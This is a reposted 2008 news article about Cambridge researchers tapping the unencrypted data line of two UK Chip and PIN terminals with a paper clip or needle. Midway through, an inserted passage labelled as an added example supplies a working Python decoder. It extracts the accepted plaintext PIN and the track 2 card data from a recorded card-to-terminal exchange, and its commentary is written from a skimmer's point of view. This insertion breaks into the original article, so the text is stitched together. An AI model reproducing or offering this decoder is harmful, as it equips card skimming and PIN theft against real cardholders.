subject: Paper clip attack skewers Chip and PIN
posted: Fri, 29 Feb 2008 10:19:58 -0000


Paper clip attack skewers Chip and PIN

Tapping up
By John Leyden
Published Wednesday 27th February 2008 17:05 GMT

UK researchers have uncovered a serious flaw in the Chip and PIN
machines that authenticate debit and credit card transactions.

Two of the most popular PIN entry devices (PED) in the UK - the
Ingenico i3300 and Dione Xtreme - are vulnerable to a "tapping
attack", using nothing more sophisticated than a paper clip, a needle
and a small recording device.

This basic kit enabled University of Cambridge Computer Labs
researchers to record data exchanged between a card and the device's
processor without triggering tamper-proofing mechanisms. The devices
analysed by the team were borrowed from merchants, but they can also
be purchased online for as little as $20.

In a technical paper (PDF) the researchers explain that in both PIN
entry devices they examined the secure storage for cryptographic keys
is well protected. However, in each case it is possible to tap the
data line between the card and the PIN Entry device's processor. The
data exchanged on this line is not encrypted so the problem becomes
one of getting physical access to the link and of hiding this covert
snooping.

The Ingenico PED includes 1mm holes that give a bent paper clip access
to the printed circuit board. "This can be inserted through a hole in
the plastic surrounding the internal compartment, and does not leave
any external marks," the Cambridge researchers explain. Handily, the
Ingenico PED also provides a concealed compartment designed to hold
optional SIM-sized cards that expand its functionality. That
compartment is not intended to be tamper-proof, so although it does not
give direct access to the circuit board, it does give the attacker a
hidden space in which to stow the wiretap.

The Dione PED offers no such concealed compartment, but is still
vulnerable. The Cambridge researchers drilled a 0.8mm hole from the
rear and inserted a 4cm needle through it into a flat ribbon connector
socket. A thin wire from the needle, interfaced through a small board,
can then carry the captured data to a laptop.

The Cambridge researchers conclude that the attack is far easier to
pull off than the banking industry claims:

"What should have required $25,000 needed just a bent paper clip, a
needle, a short length of wire and some creative thinking; attaching
them to the data line takes minutes with some practice. A small FPGA
or microcontroller board with some non-volatile memory can easily fit
inside the Ingenico PED's compartment and record transaction details
without the cardholder's knowledge, while a wire routed from the back
of a mounted Dione PED to a recorder under the counter will not be
detected unless the cardholder conducts a very close inspection - and
knows what to look for."

"The recording circuit can be very small and either battery operated
or attached to the PED's power supply; with a full transaction
requiring about 1 kB of storage, even a small memory can record
thousands of transactions. Detecting such a tap from within the PED
is extremely difficult, since high input impedance probes do not
significantly distort signals, and proper termination suppresses
reflections."

"This attack can capture the card's PIN because UK banks have opted
to issue cheaper cards that do not use asymmetric cryptography to
encrypt data between the card and PED," the Cambridge researchers
note.

A demo of the attack featured on the UK news programme Newsnight on
Tuesday.

It gets worse. For backward compatibility, Chip and PIN cards still
carry a magnetic stripe, and the chip hands the PED the same account
data that the stripe holds, over the same unencrypted line. Fraudsters
tapping the link between card and processor therefore get everything
needed to write a cloned magnetic-stripe card. Add the corresponding
PIN, and the clone can be used to withdraw cash at the many ATMs
overseas that have not been upgraded to read chips and so rely solely
on the easily-faked magnetic stripe.
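The two preceding passages describe what a recorder on the card-to-PED data line yields: the PIN, sent in the clear in the card's VERIFY command when the card has no RSA key to encipher it, and the track 2 equivalent data that a magstripe clone needs. The following is an added example, not code from the Cambridge paper or from The Register, showing how a decoder for such a capture would pull both out of a log of ISO 7816 command/response pairs. Every byte in it is constructed test data (the well-known 4111... test PAN, a made-up PIN and expiry), and the split of the half-duplex I/O line into command/response pairs is assumed to have been done by the recorder already. It also shows the one case where the tap comes up empty: a VERIFY carrying an enciphered PIN block, which only cards with asymmetric crypto can send.

```python
"""Added example (not from the Cambridge paper or the article): decode an
EMV command/response log as a tap on the card-to-PED data line would see
it. All bytes below are constructed test data."""

from typing import Dict, List, Optional, Tuple

# ISO 7816-4 / EMV Book 3 values used below
INS_READ_RECORD = 0xB2
INS_VERIFY = 0x20
P2_PLAINTEXT_PIN = 0x80   # VERIFY with a plaintext PIN block
P2_ENCIPHERED_PIN = 0x88  # VERIFY with an RSA-enciphered PIN block
TAG_TRACK2 = "57"         # Track 2 Equivalent Data


def parse_tlv(data: bytes, out: Optional[Dict[str, bytes]] = None) -> Dict[str, bytes]:
    """Flatten a BER-TLV blob into {hex tag: value}, descending into
    constructed tags (bit 6 of the first tag byte set)."""
    out = {} if out is None else out
    i = 0
    while i < len(data):
        if data[i] in (0x00, 0xFF):          # padding between objects
            i += 1
            continue
        start, first = i, data[i]
        i += 1
        if first & 0x1F == 0x1F:             # multi-byte tag, e.g. 5F20
            while data[i] & 0x80:
                i += 1
            i += 1
        tag = data[start:i].hex().upper()
        length = data[i]
        i += 1
        if length & 0x80:                    # long form: 0x81 xx, 0x82 xx xx
            n = length & 0x7F
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        value = data[i:i + length]
        i += length
        if first & 0x20:
            parse_tlv(value, out)            # constructed: recurse
        else:
            out[tag] = value
    return out


def decode_track2(value: bytes) -> Dict[str, str]:
    """Track 2 Equivalent Data: PAN 'D' YYMM service-code discretionary,
    BCD-packed and padded with F. This is what a magstripe clone needs."""
    digits = value.hex().upper().rstrip("F")
    pan, _, rest = digits.partition("D")
    return {"pan": pan, "expiry": rest[:4], "service_code": rest[4:7],
            "discretionary": rest[7:], "track2": digits}


def decode_pin_block(block: bytes) -> Optional[str]:
    """EMV plaintext PIN block: 0x2N, then N BCD digits, then F padding."""
    if len(block) != 8 or block[0] >> 4 != 2:
        return None
    n = block[0] & 0x0F
    nibbles = block[1:].hex().upper()
    pin, pad = nibbles[:n], nibbles[n:]
    if not (4 <= n <= 12) or not pin.isdigit() or pad.strip("F"):
        return None
    return pin


def extract_from_log(log: List[Tuple[bytes, bytes]]) -> dict:
    """Walk (command APDU, response) pairs as captured on the I/O line and
    keep the PIN the card actually accepted (SW 9000) plus the card data."""
    result = {"pin": None, "pin_attempts": [], "enciphered_pin": False}
    for cmd, rsp in log:
        ins, p2 = cmd[1], cmd[3]
        body, sw = rsp[:-2], rsp[-2:].hex().upper()
        if ins == INS_READ_RECORD and sw == "9000":
            tlv = parse_tlv(body)
            if TAG_TRACK2 in tlv:
                result.update(decode_track2(tlv[TAG_TRACK2]))
        elif ins == INS_VERIFY:
            if p2 == P2_ENCIPHERED_PIN:      # RSA card: the tap sees only ciphertext
                result["enciphered_pin"] = True
                continue
            pin = decode_pin_block(cmd[5:5 + cmd[4]])
            result["pin_attempts"].append((pin, sw))   # 63Cx = wrong, x tries left
            if sw == "9000":
                result["pin"] = pin
    return result


# Constructed capture: SELECT, READ RECORD (record holds tag 57 and the
# cardholder name), a wrong PIN (63C2), then the right PIN (9000).
CAPTURED_LOG = [
    (bytes.fromhex("00A4040007A000000003101000"),
     bytes.fromhex("6F0B8407A0000000031010A5009000")),
    (bytes.fromhex("00B2010C00"),
     bytes.fromhex("701D" "5710" "4111111111111111D25121011234567F"
                   "5F2008" "444F452F4A4F484E" "9000")),
    (bytes.fromhex("0020008008" "241111FFFFFFFFFF"), bytes.fromhex("63C2")),
    (bytes.fromhex("0020008008" "241234FFFFFFFFFF"), bytes.fromhex("9000")),
]

# Constructed capture from a card that enciphers the PIN under its RSA key
ENCIPHERED_LOG = [
    (bytes.fromhex("0020008880") + bytes(128), bytes.fromhex("9000")),
]

if __name__ == "__main__":
    print(extract_from_log(CAPTURED_LOG))
    print(extract_from_log(ENCIPHERED_LOG))
```

The filter on the VERIFY status word is the part a practical recorder cares about: a tap sees every PIN the cardholder mistypes, and only the attempt answered with 9000 is worth the ~1 kB of storage the researchers budget per transaction. The enciphered case is the flip side of the article's point about cheaper cards: with an RSA-capable card the same wire still carries the track data, but the PIN block is ciphertext.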

Tampered PIN entry devices have already been used for fraud. Last
December, £80,000 was stolen from 1,500 people in Leicestershire when
crooks cloned their cards using a doctored device in a local petrol
station.

The process used to certify PIN entry device security is substandard,
the Cambridge team argues. Evaluation should be more open, and
defective devices should be refused certification, they say.

The Cambridge Chip and PIN scenarios pose little threat in the real
world, according to APACS, the banking association which spearheaded
the introduction of Chip and PIN in the UK. "The types of attack on
PIN entry devices detailed in this report are difficult to undertake
and not currently economically viable for a fraudster to carry out,"
a spokesman said.

Ross Anderson, a member of the research team and professor of
security engineering at Cambridge, said: "The lessons we learned are
not limited to banking. Other fields, from voting machines to
electronic medical record systems, suffer from the same combination
of stupid mistakes, sham evaluations and obstructive authorities.
Where the public are forced to rely on the security of a system, we
need honest security evaluations that are published and subjected to
peer review."

The Cambridge team presents its findings in full in May at the IEEE
Symposium on Security and Privacy conference in Oakland, California.
Anderson's colleagues are Saar Drimer and Steven Murdoch.

---
* Origin: [adminz] tech, security, support -
http://cyberdelix.net/adminz/